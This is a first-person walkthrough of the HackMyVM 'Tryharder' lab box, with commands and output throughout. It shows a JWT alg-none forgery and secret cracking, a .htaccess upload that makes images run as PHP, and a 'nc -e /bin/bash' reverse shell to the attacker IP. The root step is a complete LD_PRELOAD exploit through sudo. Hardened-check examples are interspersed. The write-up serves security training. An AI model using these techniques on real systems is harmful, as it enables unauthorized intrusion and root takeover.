HackMyVM-Tryharder-Walkthrough
城南花已开 Lv6

Information gathering

Service detection

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.130 08:00:27:69:07:dc PCS Systemtechnik GmbH
192.168.60.254 00:50:56:ed:51:7b VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.052 seconds (124.76 hosts/sec). 4 responded
export ip=192.168.60.130
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.130:22
Open 192.168.60.130:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 08:19 CST
Initiating ARP Ping Scan at 08:19
Scanning 192.168.60.130 [1 port]
Completed ARP Ping Scan at 08:19, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:19
Completed Parallel DNS resolution of 1 host. at 08:19, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:19
Scanning 192.168.60.130 [2 ports]
Discovered open port 22/tcp on 192.168.60.130
Discovered open port 80/tcp on 192.168.60.130
Completed SYN Stealth Scan at 08:19, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.60.130
Host is up, received arp-response (0.00034s latency).
Scanned at 2025-04-10 08:19:10 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:69:07:DC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Directory enumeration

❯ gobuster dir -u http://192.168.60.130 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 50 -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.130
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 7371]
Progress: 132920 / 132925 (100.00%)
===============================================================
Finished
===============================================================

Looking at the page source, there is a comment inside the CSS stylesheet.

It gives an API path: /NzQyMjE=

❯ curl $ip
…………………………omitted………………
<title>西溪湖科技 - 企业门户网站</title>
<style>
:root {
--primary-color: #2c3e50;
--secondary-color: #3498db;
--accent-color: #e74c3c;
--text-color: #333;
--light-bg: #f9f9f9;
/* 调试信息:API路径 /NzQyMjE= */
</style>
</head>
<body>
<div class="header">
<h1 class="logo">西溪湖科技</h1>
<p class="tagline">创新科技,引领未来</p>
</div>

<div class="nav">
<div class="nav-container">
<div>
<a href="#">首页</a>
<a href="#">关于我们</a>
<a href="#">产品服务</a>
<a href="#">解决方案</a>
<a href="#">新闻动态</a>
<a href="#">联系我们</a>
</div>
<div>
<a href="#" class="btn">内部登录</a>
</div>
</div>
</div>

<div class="main-content">
<div class="hero-section">
<h2>数字化转型的最佳合作伙伴</h2>
<p>西溪湖科技致力于为企业提供全方位的数字化解决方案,帮助客户 在数字时代保持竞争力</p>
<a href="#" class="btn">了解更多</a>
</div>

<div class="news-section">
<h2 class="section-title">最新公告</h2>
<div class="news-grid">
<div class="news-item">
<h3>系统维护通知</h3>
<p>系统将于本周日进行例行维护,维护期间部分功能可能无 法使用。我们将尽量减少对您使用的影响。</p>
<a href="#" class="btn">查看详情</a>
</div>
<div class="news-item">
<h3>公司新闻</h3>
<p>公司成功举办2024年度技术研讨会,多位行业专家参与交 流,共同探讨人工智能与大数据的未来发展。</p>
<a href="#" class="btn">查看详情</a>
</div>
<div class="news-item">
<h3>产品更新</h3>
<p>我们的旗舰产品"数据安全卫士"已发布最新版本,新增多 项安全防护功能,提升企业数据安全水平。</p>
<a href="#" class="btn">查看详情</a>
</div>
</div>
</div>
</div>

<div class="footer">
<p>© 2024 西溪湖科技有限公司 版权所有 | 浙ICP备XXXXXXXX号</p>
</div>

<script>
document.addEventListener('DOMContentLoaded', function() {
// 页面加载完成后的初始化代码
console.log('页面加载完成');
});
</script>
</body>
</html>

Base64-decode it:

echo "NzQyMjE="|base64 -d
74221

Try enumerating this directory as well, and open it in the browser at the same time.

❯ gobuster dir -u http://192.168.60.130/74221/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -t 50 -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.130/74221/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 2174]
/. (Status: 200) [Size: 2174]
/dashboard.php (Status: 302) [Size: 0] [--> index.php]
Progress: 81220 / 81225 (99.99%)
===============================================================
Finished
===============================================================

JWT vulnerability

There is a login form; after a few attempts it seems there is no admin user.


Brute force was the only option left. I tried many wordlists here and finally got a hit.

❯ wfuzz -c -u "http://192.168.60.130/74221/index.php" -d "username=FUZZ&password=FUZ2Z" -H "User-Agent:Mozilla/5.0" -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w 5000.txt --hw 167
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.130/74221/index.php
Total requests: 85000

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000010001: 302 0 L 0 W 0 Ch "test - 123456"

Total time: 38.70372
Processed Requests: 68806
Filtered Requests: 68805
Requests/sec.: 1777.761

After logging in, it tells you that you are not admin,

so there is no file upload function.


We can see that a Cookie is issued after a successful login, and it is obviously a JWT.


❯ vim hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2025-04-10 09:03) 0g/s 11661Kp/s 11661Kc/s 11661KC/s "chinor23"..*7¡Vamos!
Session completed.

After brute force failed, I tried changing the algorithm to None.

JWT Vulnerabilities (JSON Web Tokens) - HackTricks


Modifying the Cookie is enough to get admin privileges.


.htaccess upload vulnerability

After repeated attempts at bypassing the file upload filter,

I found that .htaccess can be uploaded. We change its contents so that any file with the .png extension is parsed and executed as a PHP script.


Then upload any reverse shell, renaming its extension to png or appending png to it.

User privilege escalation

Listen on a port on Kali

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Tryharder-192.168.60.130-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Tryharder~192.168.60.130_Linux_x86_64/2025_04_10-09_32_25-274.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
www-data@Tryharder:/$

I took a quick look at the JWT code logic.

It really was a weak secret after all; I had just used the wrong wordlist.

The author left two holes, a bonus for beginners 🤣

www-data@Tryharder:/var/www/html/74221$ cat jwt.php
<?php
function base64UrlEncode($data) {
    return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}

function base64UrlDecode($data) {
    return base64_decode(strtr($data, '-_', '+/'));
}

function generateJWT($payload) {
    $header = ['alg' => 'HS256', 'typ' => 'JWT'];
    $secret = 'jwtsecret123'; // weak secret

    $headerEncoded = base64UrlEncode(json_encode($header));
    $payloadEncoded = base64UrlEncode(json_encode($payload));
    $signature = hash_hmac('sha256', "$headerEncoded.$payloadEncoded", $secret, true);
    $signatureEncoded = base64UrlEncode($signature);

    return "$headerEncoded.$payloadEncoded.$signatureEncoded";
}

function verifyJWT($token) {
    $parts = explode('.', $token);
    if (count($parts) !== 3) return false;

    [$headerEncoded, $payloadEncoded, $signatureEncoded] = $parts;
    $header = json_decode(base64UrlDecode($headerEncoded), true);
    $payload = json_decode(base64UrlDecode($payloadEncoded), true);
    $secret = 'jwtsecret123';

    // Vulnerability: alg: none is accepted
    if ($header['alg'] === 'none') {
        return $payload; // no signature verification
    }

    $expectedSignature = hash_hmac('sha256', "$headerEncoded.$payloadEncoded", $secret, true);
    $signature = base64UrlDecode($signatureEncoded);

    if (hash_equals($expectedSignature, $signature) && $payload['exp'] > time()) {
        return $payload;
    }
    return false;
}
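The two defects in jwt.php above (a client-chosen alg, and a weak secret) side by side with a fixed verifier. This is an added Python example, not the box's code: verify_vulnerable mirrors the PHP logic, verify_hardened pins HS256 server-side and requires a valid exp; the secret and token layout are taken from the page, everything else is constructed here.

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = "jwtsecret123"  # the weak secret from jwt.php, kept only to mirror its behaviour


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def hs256(signing_input: str, secret: str) -> bytes:
    return hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()


def issue_token(payload: dict, secret: str = SECRET) -> str:
    """Same construction as the page's generateJWT(): HS256 over header.payload."""
    h = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = b64url_encode(hs256(f"{h}.{p}", secret))
    return f"{h}.{p}.{sig}"


def unsigned_token(payload: dict) -> str:
    """Header with alg none and an empty third segment, the shape the walkthrough sends."""
    h = b64url_encode(b'{"alg":"none","typ":"JWT"}')
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h}.{p}."


def verify_vulnerable(token: str, secret: str = SECRET):
    """Mirror of the page's verifyJWT(): the decision depends on the client-supplied alg."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    payload = json.loads(b64url_decode(p))
    if header.get("alg") == "none":
        return payload  # returned without any signature check
    if hmac.compare_digest(hs256(f"{h}.{p}", secret), b64url_decode(s)) and payload.get("exp", 0) > time.time():
        return payload
    return None


def verify_hardened(token: str, secret: str = SECRET):
    """The algorithm is fixed server-side; the header may only confirm it, never change it."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    try:
        header = json.loads(b64url_decode(h))
        payload = json.loads(b64url_decode(p))
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(payload, dict) or header != {"alg": "HS256", "typ": "JWT"}:
        return None  # alg none and every other header variant are rejected before any crypto runs
    if not hmac.compare_digest(hs256(f"{h}.{p}", secret), b64url_decode(s)):
        return None
    exp = payload.get("exp")
    if not isinstance(exp, (int, float)) or exp <= time.time():
        return None  # expiry is mandatory and checked for every token
    return payload
```

The secret itself still needs replacing with a long random value: pinning the algorithm does nothing against the wordlist attack shown below.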

seclists has a wordlist specifically for JWT secrets

❯ grep -nri "jwtsecret123" /usr/share/seclists/
/usr/share/seclists/Passwords/scraped-JWT-secrets.txt:2417:jwtSecret123
/usr/share/seclists/Passwords/scraped-JWT-secrets.txt:2429:jwtsecret1234jwtsecret1234jwtsecret1234jwtsecret1234
/usr/share/seclists/Passwords/scraped-JWT-secrets.txt:103929:jwtsecret123
❯ john hash --wordlist=/usr/share/seclists/Passwords/scraped-JWT-secrets.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jwtsecret123 (?)
1g 0:00:00:00 DONE (2025-04-10 09:39) 50.00g/s 5193Kp/s 5193Kc/s 5193KC/s vhtpc4600..!@2222222fasdhiohDCWQA
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

In the file upload logic, the author also deliberately left the htaccess extension in the allowlist

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
    $file = $_FILES['file'];
    $filename = basename($file['name']);
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    $allowed = ['jpg', 'png', 'htaccess'];

    if (in_array($ext, $allowed)) {
        $target = "$upload_dir/$filename";
        if (move_uploaded_file($file['tmp_name'], $target)) {
            $display_path = "./uploads/$user_id/$filename";
            $message = "File uploaded successfully: <a href='$display_path'>$display_path</a>";
        } else {
            $error = "Upload failed! Path: $upload_dir, Error: " . $_FILES['file']['error'];
        }
    } else {
        $error = "Only .jpg and .png files are allowed!";
    }
} else {
    $error = "No file uploaded or invalid request.";
}
?>
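What a stricter version of the check above would look like, as an added Python example rather than the box's PHP: page_extension_check reproduces the page's allowlist (note that pathinfo() reports the extension of ".htaccess" as "htaccess"), while hardened_check rejects dotfiles and double extensions, verifies the magic bytes, and discards the client-chosen name; the magic-byte table and the name pattern are my assumptions.

```python
import os
import re
import secrets

ALLOWED = {"jpg", "png"}  # the page's allowlist without the "htaccess" entry
MAGIC = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}  # assumed file signatures
STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


def page_extension_check(filename: str) -> bool:
    """Mirror of the page's check: the last extension against an allowlist containing htaccess."""
    name = os.path.basename(filename)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""  # '.htaccess' -> 'htaccess'
    return ext in {"jpg", "png", "htaccess"}


def hardened_check(filename: str, head: bytes):
    """Return (accepted, reason_or_stored_name) for an uploaded file's name and first bytes."""
    name = os.path.basename(filename)
    if name.startswith(".") or name.count(".") != 1:
        return False, "dotfile or multiple extensions"  # blocks .htaccess and shell.php.png alike
    stem, ext = name.split(".")
    ext = ext.lower()
    if not STEM.fullmatch(stem):
        return False, "unexpected characters in name"
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not head.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    # Store under a server-chosen name so the client never controls the path on disk
    return True, f"{secrets.token_hex(8)}.{ext}"
```

Independently of the check, setting AllowOverride None on the uploads directory stops Apache from honouring a .htaccess there at all, so a handler override cannot turn image files into PHP.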

OK, let's continue with information gathering.

There are two users: pentester and xiix.

It seems both users have something set in their comment field.

www-data@Tryharder:/tmp$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
pentester:x:1000:1000:Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight...:/home/pentester:/bin/bash
xiix:x:1001:1001:A Tale of Two Cities:/home/xiix:/bin/bash

Translating it, it is the famous opening line of A Tale of Two Cities, but with some special characters mixed in, which might be used as separators.

Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight
It was the best of times, it was the worst of times; it was the age of wisdom, it was the age of foolishness; it was the epoch of belief, it was the epoch of incredulity; it was the season of Light

The user flag is also directly readable by www-data.

www-data@Tryharder:/home/pentester$ cat user.txt
Flag{c4f9375f9834b4e7f0a528cc65c055702bf5f24a}

There is also a hint in the user's home directory.

Something about a Caesar cipher.

www-data@Tryharder:/home/pentester$ cat .note
Two cities clashed in tale: Smash Caesar, buddy, to pass.

Port 8989 is open locally.

Try forwarding it out.

www-data@Tryharder:/tmp$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:8989 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
[!] Session detached ⇲
(Penelope)─(Session [1])> portfwd 0.0.0.0:8989<-127.0.0.1:8989
[+] Setup Port Forwarding: 0.0.0.0:8989 <- 127.0.0.1:8989

Connecting with nc, it says access denied.

❯ nc 127.0.0.1 8989
aaa
Enter password: Access denied!

Upload pspy64 and monitor system processes.

The system executes /srv/backdoor.py every minute.

2025/04/09 22:54:01 CMD: UID=0 PID=22533 | /usr/sbin/CRON -f
2025/04/09 22:54:01 CMD: UID=0 PID=22534 | /usr/sbin/CRON -f
2025/04/09 22:54:01 CMD: UID=1001 PID=22535 | /bin/sh -c /srv/backdoor.py

However, backdoor.py belongs to xiix and is not readable by other users.

And there is also a hidden file named ...

www-data@Tryharder:/srv$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Mar 23 23:42 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
-rw-r--r-- 1 root root 161 Mar 23 11:28 ...
-rwx------ 1 xiix xiix 1012 Mar 23 23:42 backdoor.py
www-data@Tryharder:/srv$ cat ...
Iuwbtthfbetuoftimfs"iuwbsuhfxpsttoguinet@jtwbttieahfogwiseon#iuxatthfageofgpoljthoess%itwbsuiffqocipfbemieg-iuxbsuhffqpdhogjocredvljtz,'iuwasuhesfasooofLjgiu../

I got stuck here for a while and asked the author for a hint; it is actually a common CTF encoding.

You can see that these two ciphertexts are identical in some places and differ in others.

❯ diff 1 2
1c1
< Iuwbtthfbetuoftimfs"iuwbsuhfxpsttoguinet@jtwbttieahfogwiseon#iuxatthfageofgpoljthoess%itwbsuiffqocipfbemieg-iuxbsuhffqpdhogjocredvljtz,'iuwasuhesfasooofLjgiu../
---
> Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight...

Converting both to decimal ASCII and comparing shows that ciphertext two is ciphertext one with the ASCII value of some characters incremented by 1.


In other words, treat identical ASCII codes as 0 and differing ones as 1.

Had GPT write a Python script:

def binary_diff_analysis(cipher1, cipher2):
    # Align the lengths
    min_len = min(len(cipher1), len(cipher2))
    trunc1 = cipher1[:min_len]
    trunc2 = cipher2[:min_len]

    # Build the difference bitmap
    diff_bitmap = []
    for c1, c2 in zip(trunc1, trunc2):
        if c1 == c2:
            diff_bitmap.append(0)
        else:
            # Check whether it is a +1 difference
            if (ord(c2) - ord(c1)) % 256 == 1:
                diff_bitmap.append(1)
            else:
                diff_bitmap.append(1)  # non-+1 differences are also marked as 1

    return diff_bitmap


def binary_to_ascii(diff_bitmap):
    # Turn the bitmap list into a binary string
    bin_str = ''.join(map(str, diff_bitmap))

    # Pad to a multiple of 8
    padding = (8 - len(bin_str) % 8) % 8
    padded_str = bin_str + '0' * padding

    # Split into bytes and convert to ASCII
    ascii_str = ''
    for i in range(0, len(padded_str), 8):
        byte = padded_str[i:i+8]
        decimal = int(byte, 2)
        # Filter out non-printable characters (32-126 is printable ASCII)
        ascii_str += chr(decimal) if 32 <= decimal <= 126 else '�'

    return ascii_str


# Example usage
cipher1 = "Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight..."
cipher2 = "Iuwbtthfbetuoftimfs\"iuwbsuhfxpsttoguinet@jtwbttieahfogwiseon#iuxatthfageofgpoljthoess%itwbsuiffqocipfbemieg-iuxbsuhffqpdhogjocredvljtz,'iuwasuhesfasooofLjgiu../"

# Build the difference bitmap
diff_map = binary_diff_analysis(cipher1, cipher2)
print("二进制为:", ''.join(map(str, diff_map[:64])))  # only the first 64 bits are printed as a sample

# Convert to ASCII
result = binary_to_ascii(diff_map)
print("\nASCII解码结果:", result)

Running it gives the password Y0U_5M4SH3D_17_8UDDY.

Connect with nc:

❯ nc 127.0.0.1 8989
Y0U_5M4SH3D_17_8UDDY
Enter password: Access granted!
shell> id
uid=1001(xiix) gid=1001(xiix) groups=1001(xiix)

shell>shell> nc -e /bin/bash 192.168.60.100 1234

Listen on the port.

There is a script in xiix's home directory.

[+] Got reverse shell from Tryharder-192.168.60.130-Linux-x86_64 😍️ Assigned SessionID <4>
(Penelope)─(Session [3])> use 4
(Penelope)─(Session [4])> interact
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Tryharder~192.168.60.130_Linux_x86_64/2025_04_10-13_06_22-184.log 📜
──────────────────────────────────────────────────────────────────────────
xiix@Tryharder:~$ ./guess_game
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单: 我心里有个数字(0-99),你有一次机会猜。
I have a number (0-99), you get one guess.
猜对了,我就把属于你的东西给你;猜错了?嘿嘿,后果自负!
Guess right, I’ll give your reward; wrong? Hehe, face the consequences!
提示: 聪明人也许能找到捷径。
Hint: Smart ones might find a shortcut.
输入你的猜测(0-99) / Your guess (0-99):

Since the range is only 0-99, I just brute-forced it: run it in a loop and one of the runs will hit.

Got xiix's password: superxiix

xiix@Tryharder:~$ for i in {1..100}; do echo 3 | ./guess_game; done
…………………………omitted…………………………
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单: 我心里有个数字(0-99),你有一次机会猜。
I have a number (0-99), you get one guess.
猜对了,我就把属于你的东西给你;猜错了?嘿嘿,后果自负!
Guess right, I’ll give your reward; wrong? Hehe, face the consequences!
提示: 聪明人也许能找到捷径。
Hint: Smart ones might find a shortcut.
天哪!你居然猜对了!运气逆天啊! / You got it! Amazing luck!
Pass: superxiix

The above is the conventional approach; after asking in the group, there are two more ways in.

pspy64 process monitoring

Open another tty and monitor while guess_game is running.

This is not used very often: the default is the -p flag, which only shows system commands.

Use the -f flag to watch file system events.

Apart from the long run of shared libraries loaded at the start, it finally creates .hidden_clue under the tmp directory.

root@Tryharder:/home/xiix# ./guess_game
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单: 我心里有个数字(0-99),你有一次机会猜。
I have a number (0-99), you get one guess.
猜对了,我就把属于你的东西给你;猜错了?嘿嘿,后果自负!
Guess right, I’ll give your reward; wrong? Hehe, face the consequences!
提示: 聪明人也许能找到捷径。
Hint: Smart ones might find a shortcut.
输入你的猜测(0-99) / Your guess (0-99):
-----------------------------------------------
# the other tty
2025/04/10 03:26:27 CMD: UID=0 PID=17973 | bash
2025/04/10 03:26:27 FS: ACCESS | /home/xiix/guess_game
2025/04/10 03:26:27 FS: ACCESS | /home/xiix/guess_game
2025/04/10 03:26:27 FS: ACCESS | /home/xiix/guess_game
…………………………shared libraries omitted…………………………
2025/04/10 03:26:27 FS: MODIFY | /tmp/.hidden_clue
2025/04/10 03:26:27 FS: OPEN | /tmp/.hidden_clue
2025/04/10 03:26:27 FS: MODIFY | /tmp/.hidden_clue
2025/04/10 03:26:27 FS: CLOSE_WRITE | /tmp/.hidden_clue

.hidden_clue is the random number.

root@Tryharder:/tmp# cat .hidden_clue
30
root@Tryharder:/home/xiix# ./guess_game
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单: 我心里有个数字(0-99),你有一次机会猜。
I have a number (0-99), you get one guess.
猜对了,我就把属于你的东西给你;猜错了?嘿嘿,后果自负!
Guess right, I’ll give your reward; wrong? Hehe, face the consequences!
提示: 聪明人也许能找到捷径。
Hint: Smart ones might find a shortcut.
输入你的猜测(0-99) / Your guess (0-99): 30
天哪!你居然猜对了!运气逆天啊! / You got it! Amazing luck!
Pass: superxiix

env information leak

Looking at env, there is a variable DEBUG_MODE.

xiix@Tryharder:/tmp$ env
SHELL=/bin/bash
DEBUG_MODE=1337
PWD=/tmp
LOGNAME=xiix
XDG_SESSION_TYPE=tty
HOME=/home/xiix
LANG=en_US.UTF-8
XDG_SESSION_CLASS=user
TERM=xterm-256color
USER=xiix
SHLVL=5
XDG_SESSION_ID=177
XDG_RUNTIME_DIR=/run/user/0
PATH=/usr/bin:/bin
MAIL=/var/mail/xiix
OLDPWD=/home/xiix
_=/usr/bin/env

One can guess it is debug code in guess_game, and it also reveals the password.

xiix@Tryharder:/home/xiix# ./guess_game
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单: 我心里有个数字(0-99),你有一次机会猜。
I have a number (0-99), you get one guess.
猜对了,我就把属于你的东西给你;猜错了?嘿嘿,后果自负!
Guess right, I’ll give your reward; wrong? Hehe, face the consequences!
提示: 聪明人也许能找到捷径。
Hint: Smart ones might find a shortcut.
输入你的猜测(0-99) / Your guess (0-99): 1337
后门激活! / Backdoor activated!
Pass: superxiix

Root privilege escalation

The user has sudo rights to run whoami, but executing arbitrary commands through whoami alone is nearly impossible.

xiix@Tryharder:~$ sudo -l
Matching Defaults entries for xiix on tryharder:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD

User xiix may run the following commands on tryharder:
(ALL : ALL) /bin/whoami

But if you look carefully, sudo has env_keep+=LD_PRELOAD set, so the LD_PRELOAD environment variable is preserved.

So we can hijack a function that /bin/whoami calls (such as puts or printf) and inject our own code.
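A defender-side check for this misconfiguration, added here and not part of the original walkthrough: it parses `sudo -l` output (the sample is constructed from the output above), applies env_keep =, += and -= in order the way sudoers does, and flags surviving loader variables such as LD_PRELOAD next to the commands the user may run; the list of dangerous variables is my own.

```python
import re

# Variables that let the caller decide what code a sudo-permitted binary loads or runs (assumed list).
DANGEROUS_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT", "PYTHONPATH", "PERL5OPT", "BASH_ENV"}

# Constructed sample, copied from the `sudo -l` output shown above.
SAMPLE_SUDO_L = """Matching Defaults entries for xiix on tryharder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, env_keep+=LD_PRELOAD

User xiix may run the following commands on tryharder:
    (ALL : ALL) /bin/whoami
"""

# env_keep = "A B", env_keep += X, env_keep -= "X"; quoted lists or a single bare name
ENV_KEEP = re.compile(r'env_keep\s*([+-]?=)\s*(?:"([^"]*)"|([^\s,]+))')
# "(runas) command" lines from the commands section
RUNAS_LINE = re.compile(r"^\s*\(([^)]+)\)\s*(.+?)\s*$", re.MULTILINE)


def kept_env_vars(sudo_l_output: str) -> set:
    """Names that survive env_reset after all env_keep directives are applied in order."""
    kept = set()
    for op, quoted, bare in ENV_KEEP.findall(sudo_l_output):
        names = set((quoted or bare).split())
        if op == "=":
            kept = names
        elif op == "+=":
            kept |= names
        else:
            kept -= names
    return kept


def risky_env_keep(sudo_l_output: str) -> list:
    """Kept variables that can redirect what a permitted command executes."""
    return sorted(kept_env_vars(sudo_l_output) & DANGEROUS_ENV)


def allowed_commands(sudo_l_output: str) -> list:
    """(runas, command) pairs; any risky variable applies to every one of these."""
    return RUNAS_LINE.findall(sudo_l_output)
```

The fix on this box is to drop `env_keep+=LD_PRELOAD` from sudoers (or override it with `env_keep -= LD_PRELOAD`); with env_reset in effect, sudo then strips the variable before running /bin/whoami.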

It is a bit like the Listen1 1 box I did earlier, but not exactly the same.

[HackMyVM-Listen1 1-Walkthrough | Pepster’Blog](https://pepster.me/HackMyVM-Listen 1 1/#恶意库注入)

For the detailed exploitation approach, see

Linux Privilege Escalation - HackTricks

xiix@Tryharder:~$ vi exp.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Hijack a function that /bin/whoami will call (puts, for example)
int puts(const char *s) {
    // Privilege escalation: spawn a root shell
    setuid(0);
    setgid(0);
    system("/bin/sh");
    return 0; // so as not to break the original program flow
}
xiix@Tryharder:~$ gcc -shared -fPIC exp.c -o exp.so
xiix@Tryharder:~$ sudo LD_PRELOAD=/home/xiix/exp.so /bin/whoami
# id
uid=0(root) gid=0(root) groups=0(root)
# bash
root@Tryharder:/home/xiix# cd ~
root@Tryharder:~# ls
1.c congrats.txt root.txt
root@Tryharder:~# cat root.txt
Flag{7ca62df5c884cd9a5e5e9602fe01b39f9ebd8c6f}
root@Tryharder:~# cat congrats.txt
